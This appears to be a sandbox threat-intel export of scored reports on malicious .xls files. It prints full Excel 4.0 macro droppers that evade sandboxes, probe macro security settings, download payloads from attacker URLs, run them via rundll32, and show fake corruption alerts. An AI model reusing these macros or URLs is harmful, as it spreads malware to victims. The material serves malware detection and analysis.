{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6a1657cffead8baf861e47bcc946cb18c6d06045b0e324abe6219a27de72bdc"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b6a1657cffead8baf861e47bcc946cb18c6d06045b0e324abe6219a27de72bdc","filesize":168448,"md5":"c692148791fd4f030a0aef948b46d1a5","sha1":"72f523124844923beda16517cd1dc61b83e8db86","sha256":"b6a1657cffead8baf861e47bcc946cb18c6d06045b0e324abe6219a27de72bdc","sha512":"a2f3c955c8858a84f91102ba75e91e7ef88dca7a1f145b52754f95a78f02e4fc9bd452468041e6e015e395336b5188b05ce283cf3102becc44e7e28a62a299e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6a1657cffead8baf861e47bcc946cb18c6d06045b0e324abe6219a27de72bdc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"R4Tr388zx1\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6ad808953e43dd32c7d12d8e5f04ae196071a9ce843eda93f6fd69fe89a6040"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b6ad808953e43dd32c7d12d8e5f04ae196071a9ce843eda93f6fd69fe89a6040","filesize":167936,"md5":"52eb24eafbd1e9837baf24b5b47fc80c","sha1":"a6b4d932a899db31ee22cf3033fc0b8bd9020762","sha256":"b6ad808953e43dd32c7d12d8e5f04ae196071a9ce843eda93f6fd69fe89a6040","sha512":"1ad1b0624a8c9aee32c455996e1f6e29d998437283ba31425a28af5352ed2e270d0250207a38896cc1440d1a91918c9f2b3cc9940e1ffbe6ca6a51c9eda4afa0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6ad808953e43dd32c7d12d8e5f04ae196071a9ce843eda93f6fd69fe89a6040.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yjQ6bnXrZp\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6b5df768df840784a99e50f5aedef117432788a652b846bc285e92c671269c8"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b6b5df768df840784a99e50f5aedef117432788a652b846bc285e92c671269c8","filesize":185344,"md5":"d9d0380b8dba94cb12cc63399d3a5a4f","sha1":"0c9159c9249e81e75a1efef32a3cfb0058dec1e5","sha256":"b6b5df768df840784a99e50f5aedef117432788a652b846bc285e92c671269c8","sha512":"d18c1efc4d300e8c09b4c1db0358f9ae3068b14156d6cc0f4841f7e58bfa41419aea54b622e3fa96e6a2decdfae2a23318c7146760b3952edd9ea8a0f483ffe0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6b5df768df840784a99e50f5aedef117432788a652b846bc285e92c671269c8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6c0e3c249286c583b0eaad93add547008f3e782420704c3e6abecc1fdb6847c"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b6c0e3c249286c583b0eaad93add547008f3e782420704c3e6abecc1fdb6847c","filesize":168960,"md5":"f2a2dad6ed7891e9169bd4c917fe1345","sha1":"5e155c40973a41b9c27bbdc0393e93173fae82ec","sha256":"b6c0e3c249286c583b0eaad93add547008f3e782420704c3e6abecc1fdb6847c","sha512":"1615a01171ee1429699c0c6ee6d387c301b93bec212b4a5c089675682c3b265b2909fc67deab0d6c3ce6b1e875482881faedfc54c1db69c5b111d43308511500","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6c0e3c249286c583b0eaad93add547008f3e782420704c3e6abecc1fdb6847c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oe1OlyREu1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6ca2c1f0a56c6c0891c61af88214f2144544e14ec33f64b142b10ca4db0e64f"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b6ca2c1f0a56c6c0891c61af88214f2144544e14ec33f64b142b10ca4db0e64f","filesize":112128,"md5":"0da9e7f625142fe05037b373817bc2e8","sha1":"9fd8dcb4e8240bc18f0b31a5be277271d3f7b45f","sha256":"b6ca2c1f0a56c6c0891c61af88214f2144544e14ec33f64b142b10ca4db0e64f","sha512":"6c017f918d2e2f32a963e831671c1a4b17d0a49ff35057432173bfb653048aece097f66b90ca127657fa4243a0d95d57e0ca0ea52192c98094e060d3cb66576a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6ca2c1f0a56c6c0891c61af88214f2144544e14ec33f64b142b10ca4db0e64f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6e95e21c933af6216a96ea3d2651d3a9389a8626a7341c13969601de6d3e225"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b6e95e21c933af6216a96ea3d2651d3a9389a8626a7341c13969601de6d3e225","filesize":104448,"md5":"a1f1979cc645c69c12049b46938f59e4","sha1":"43c6544b7ec7f080faa19c3dd79df442c3d8279a","sha256":"b6e95e21c933af6216a96ea3d2651d3a9389a8626a7341c13969601de6d3e225","sha512":"3d576ab7a06dbe7e0918b1db7f22b71e60c95c8b83f7f8c63613b26684fc7efb84ca49fb732de097e6cec5f11ee1646f1c22c0824d25330d0dd9ba73e550b181","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6e95e21c933af6216a96ea3d2651d3a9389a8626a7341c13969601de6d3e225.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Xdj5Q6SOnE\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b704b801462e71b38defa3fb2a784aba10096298b8d505201a688a9600c79b35"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b704b801462e71b38defa3fb2a784aba10096298b8d505201a688a9600c79b35","filesize":225280,"md5":"390eb5f1830fb342b808f73889d56888","sha1":"289e5a0798cbbad1585a3e1c6f21561b8952904c","sha256":"b704b801462e71b38defa3fb2a784aba10096298b8d505201a688a9600c79b35","sha512":"b010c928672c76de843fce1a2f99ea2181d151a260897c90e55bfcd0b0ca0421f10ad0a47780465950aca4db165810a18170fdcb635f674710b5c1595e83222b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b704b801462e71b38defa3fb2a784aba10096298b8d505201a688a9600c79b35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GKgUWV8Xv9\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b729334fe64507cd8d0c2b8208c9596856abe499b1a208b122981af7a279ce7a"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b729334fe64507cd8d0c2b8208c9596856abe499b1a208b122981af7a279ce7a","filesize":112640,"md5":"7bbc3a40387bb63258599c51e6f11131","sha1":"eea2d2c16251094005a569840249898b0dd02b19","sha256":"b729334fe64507cd8d0c2b8208c9596856abe499b1a208b122981af7a279ce7a","sha512":"f815554e52d24ce960370984b6341d53138a55fbff7c784d541e37f6b93f075c355d9737cb05df995e17acf658ae98a29780fa2bea67785f3609733ce42ce7d7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b729334fe64507cd8d0c2b8208c9596856abe499b1a208b122981af7a279ce7a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b729ff60ffa60ae95e8d1352f1f259cca30e687061ff539880dc773dcce78a64"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b729ff60ffa60ae95e8d1352f1f259cca30e687061ff539880dc773dcce78a64","filesize":152576,"md5":"399ed378e6602e14b5648cd2e186c143","sha1":"ed6645d7d2c38799c8aedd47373bd55133f800d1","sha256":"b729ff60ffa60ae95e8d1352f1f259cca30e687061ff539880dc773dcce78a64","sha512":"6fa748b6b23f5d3f237e09a3521cfbefaf1bf7e100fda4e150d65790643a11e4b9b510cdbecd3a1afd02ae78939a043c3b11812d99f33efda375e493b9bccb78","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b729ff60ffa60ae95e8d1352f1f259cca30e687061ff539880dc773dcce78a64.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oCw15YJacJ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b737eea19f9402b36d531aa70c485fea8e5933911e220740101ee222512a0038"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b737eea19f9402b36d531aa70c485fea8e5933911e220740101ee222512a0038","filesize":209920,"md5":"11d6eaf71639e2b6b34c28e1afaf6d64","sha1":"43f015d8eccacd8ca88f55092dd8c90e362be869","sha256":"b737eea19f9402b36d531aa70c485fea8e5933911e220740101ee222512a0038","sha512":"cc6ea49b2b7c671df5fe1406805d8ec1998a13b7a68b160a47c2e41d69492d6943947edf706e1046233d463dad7f005389f81947be4bac0163e6b8f609a3e3af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b737eea19f9402b36d531aa70c485fea8e5933911e220740101ee222512a0038.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"btsjNfWSKr\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7504c14e4e2c6b8aaf1093808c10f790710b93de3d50e312d4473addeeb57d8"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b7504c14e4e2c6b8aaf1093808c10f790710b93de3d50e312d4473addeeb57d8","filesize":185344,"md5":"cfe58c5ef6e726318c5afcf53bd90a03","sha1":"18ac5ee36b057f30080705435d828c0fb00b112d","sha256":"b7504c14e4e2c6b8aaf1093808c10f790710b93de3d50e312d4473addeeb57d8","sha512":"26bffcbd2cc4cf64fbe54d7e2640ded066b512400e94d94afc00faa6a7c756d0f5ec75ed65b450aab733c1eed48fe9cc87bd9b9ee06d340ec31ac8a08f402b50","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7504c14e4e2c6b8aaf1093808c10f790710b93de3d50e312d4473addeeb57d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7559221f4ad6331992f576cf213b669348f77bdd104cfe3abf66a4e8791b8c0"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b7559221f4ad6331992f576cf213b669348f77bdd104cfe3abf66a4e8791b8c0","filesize":144384,"md5":"6ce3b697f121e219d73d99667f44e773","sha1":"52b2470204263c16ed7c85f8c32af04cde1a47b1","sha256":"b7559221f4ad6331992f576cf213b669348f77bdd104cfe3abf66a4e8791b8c0","sha512":"4f1742424d4ed66ed24cc29af60150277f889681c1e8e585a50ad3655eafd449c11f6e667a6374d06424505ffed3a46645a3031221a4bc6fc26ff47532679810","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7559221f4ad6331992f576cf213b669348f77bdd104cfe3abf66a4e8791b8c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"4AeHtQV0Gv\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b76ac77d9f847c2c9708346f1395b1eae4cfa2f352e2fcdc4fc978bc061acd8f"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b76ac77d9f847c2c9708346f1395b1eae4cfa2f352e2fcdc4fc978bc061acd8f","filesize":112128,"md5":"fb9138db9f08a4aa7ef16d7d55aa6f6c","sha1":"f5456f50d0061f6fafcbae2250dc80340561219e","sha256":"b76ac77d9f847c2c9708346f1395b1eae4cfa2f352e2fcdc4fc978bc061acd8f","sha512":"87dce5a5b48b661b5b3707d7391c3088098075d648c30b9c9b6579c908973e202c8081207f9b575e0f3f08fb88d1f310788ea47de8043eff70a190c4204b92c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b76ac77d9f847c2c9708346f1395b1eae4cfa2f352e2fcdc4fc978bc061acd8f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b77527d23dfbf1e82f3a733d6a920ca0b4b1d7e10c3737e1711f7f6ffad244ec"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b77527d23dfbf1e82f3a733d6a920ca0b4b1d7e10c3737e1711f7f6ffad244ec","filesize":141312,"md5":"1cf7732faee19ae651498542db397836","sha1":"0e20c1e12196cb2c934801f53b6c82e6be1dd77b","sha256":"b77527d23dfbf1e82f3a733d6a920ca0b4b1d7e10c3737e1711f7f6ffad244ec","sha512":"1ef033dbca678b39ac405bad401bc6cf971272bb4b382cc483b6c6a0be156dda40a7f58d4517ff6a9317d550d9be75779b9d965bb43a4b21c6a67776f236827b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b77527d23dfbf1e82f3a733d6a920ca0b4b1d7e10c3737e1711f7f6ffad244ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"HexuFKGzzD\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b78a3d11135bae87d23b757db1b35f3fc4af911fd70dd4b5fc4c75d88b7ad47f"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b78a3d11135bae87d23b757db1b35f3fc4af911fd70dd4b5fc4c75d88b7ad47f","filesize":185344,"md5":"e45a9066c4b5cd8f6d3dfe5ba3e0cdd5","sha1":"c36ffaeeb62b68a8b6b7722ad5e2b4b16d8a1610","sha256":"b78a3d11135bae87d23b757db1b35f3fc4af911fd70dd4b5fc4c75d88b7ad47f","sha512":"e3ad436b87113bd5958467ebba64ac9473ca8b807103d7c3d02e7d411ef0cfa0b64d281a9809ab8778243a048197a6e15f944a1aa280175228bb08b9a2e5c8b9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b78a3d11135bae87d23b757db1b35f3fc4af911fd70dd4b5fc4c75d88b7ad47f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b792e3d93822edb67be27ccef032f46881c7a3c703d9ca7d6f349229395aaa8d"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b792e3d93822edb67be27ccef032f46881c7a3c703d9ca7d6f349229395aaa8d","filesize":212992,"md5":"6e0db4e9d2425b4ce26de12d743caca2","sha1":"91fb44c9d306e022dbeb7c1e21c56c7d4d9c58d8","sha256":"b792e3d93822edb67be27ccef032f46881c7a3c703d9ca7d6f349229395aaa8d","sha512":"0e28eba7de571f3b9f69f0a458254b742ca9f69039d6070af0b5664994795103662a5b6f483fd9afd5e34eb6a84dfa9732752031608ad0ba73c3567ef300efe1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b792e3d93822edb67be27ccef032f46881c7a3c703d9ca7d6f349229395aaa8d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"auG7p5v5Jr\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7a077a2b89430386efe73172eb1fe1070cf4a08e81149f901a0d3e823d4c4f3"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b7a077a2b89430386efe73172eb1fe1070cf4a08e81149f901a0d3e823d4c4f3","filesize":113664,"md5":"1201c08271a6f26d2056e4b6b685e83b","sha1":"02a13a80cabba1f8d613c103469150d026abd573","sha256":"b7a077a2b89430386efe73172eb1fe1070cf4a08e81149f901a0d3e823d4c4f3","sha512":"8e02c9aff71fc3519ce9dc68b3628142136a3cfe7e76f1743e21d7b88937585b3e945a18ca9a9ed6f4be53b028da421cb58017946f3362ce153780b3dec96949","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7a077a2b89430386efe73172eb1fe1070cf4a08e81149f901a0d3e823d4c4f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 